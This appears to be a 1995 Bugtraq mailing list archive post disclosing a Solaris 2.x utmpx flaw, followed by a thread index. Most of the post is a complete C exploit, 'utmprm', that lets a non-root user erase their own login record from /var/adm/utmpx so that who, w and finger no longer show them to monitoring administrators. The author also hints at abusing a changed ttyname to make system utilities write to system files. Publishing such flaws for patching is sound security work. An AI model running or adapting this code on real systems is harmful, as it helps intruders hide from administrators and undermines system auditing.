Bugtraq mailing list archives
Solaris 2.x utmp hole
From: chasin () crimelab com (Scott Chasin)
Date: Wed, 17 May 95 17:07:11 MDT
The following is somewhat of a security hole in Solaris 2.x which
allows any non-root user to remove themselves from /var/adm/utmp[x]
files (who, w, finger, etc).
Now the trick here is also to exploit this enough so that you can
change your ttyname (which can easily be done) and manipulate a
system utility into writing to that new ttyname (which could be a
system file). This example only takes you out of the utmp files.
-------->8 Cut here for exploit code 8<--------
/*
* utmprm (version 1.0)
*
* Copyright, 1994, 1995 by Scott Chasin (chasin () crimelab com)
*
* This material is copyrighted by Scott Chasin, 1994, 1995. The
* usual standard disclaimer applies, especially the fact that the
* author is not liable for any damages caused by direct or indirect
* use of the information or functionality provided by this program.
*/
/* utmprm takes advantage of a Solaris 2.x utmpx system call that
* allows any user to remove themselves from the corresponding
* utmp files and partly out of the eyes of monitoring admins.
*/
#include <stdio.h>
#include <pwd.h>
#include <utmpx.h>
char *strchr(), *strdup(), *ttyname(), *getlogin();
main (argc, argv)
int argc;
char **argv;
{
uid_t ruid, getuid();
char *ttyn, *tty, *username;
struct passwd *pwd;
/* Grab our ttyname */
ttyn = ttyname(0);
if (ttyn == NULL || *ttyn == '\0')
{
fprintf (stderr, "utmprm: where are you?\n");
exit (1);
}
if (tty = strchr (ttyn + 1, '/'))
++tty;
else
tty = ttyn;
/* Grab our login name */
ruid = getuid ();
username = getlogin ();
if (username == NULL || (pwd = getpwnam (username)) == NULL ||
pwd->pw_uid != ruid)
pwd = getpwuid (ruid);
if (pwd == NULL)
{
fprintf (stderr, "utmprm: who are you?\n");
exit (1);
}
username = strdup (pwd->pw_name);
utmpx_delete (username, tty);
}
utmpx_delete (user, line)
char *user;
char *line;
{
struct utmpx utx;
struct utmpx *ut;
/* Let's build a utmpx structure that looks like
* our entries profile.
*/
strncpy (utx.ut_line, line, sizeof (utx.ut_line));
strncpy (utx.ut_user, user, sizeof (utx.ut_user));
/* We use getutxline to search /var/adm/utmpx for our
* entry.
*/
if ((ut = getutxline (&utx)) == 0)
printf ("utmprm: entry not found for %s (%s)\n", user, line);
else
{
/* We have found our utmp entry. Now lets change
* our status to that of a DEAD_PROCESS.
*/
ut->ut_type = DEAD_PROCESS;
ut->ut_exit.e_termination = 0;
ut->ut_exit.e_exit = 0;
gettimeofday (&(ut->ut_tv));
/* Using pututxline as a normal user, we take advantage
* of the fact that it calls a setuid system call to
* modify the utmpx entry we just build. The only check
* that pututxline has is that the login name in the utmpx
* entry must match that of the caller's and that the
* utmpx device entry is a real device writable by the
* caller.
*/
pututxline (ut);
printf ("utmprm: %s (%s) removed.\n", user, line);
}
endutxent ();
}
Current thread:
- Solaris 2.x utmp hole Scott Chasin (May 17)
- Re: Solaris 2.x utmp hole Jas (May 17)
- Re: Solaris 2.x utmp hole Scott Barman (May 18)
- <Possible follow-ups>
- Re: Solaris 2.x utmp hole cjc () summit novell com (May 18)
- Re: Solaris 2.x utmp hole Claudio Telmon (May 18)
- Re: Solaris 2.x utmp hole Claudio Telmon (May 19)
- Re: Solaris 2.x utmp hole System Admin (May 18)
- Another translation Patrick Horgan (May 18)
- Re: Solaris 2.x utmp hole gio () DI UniPi IT (May 19)
- From the moderator: READ Please Scott Chasin (May 19)
- Re: From the moderator: READ Please Claudio Telmon (May 22)
(Thread continues...)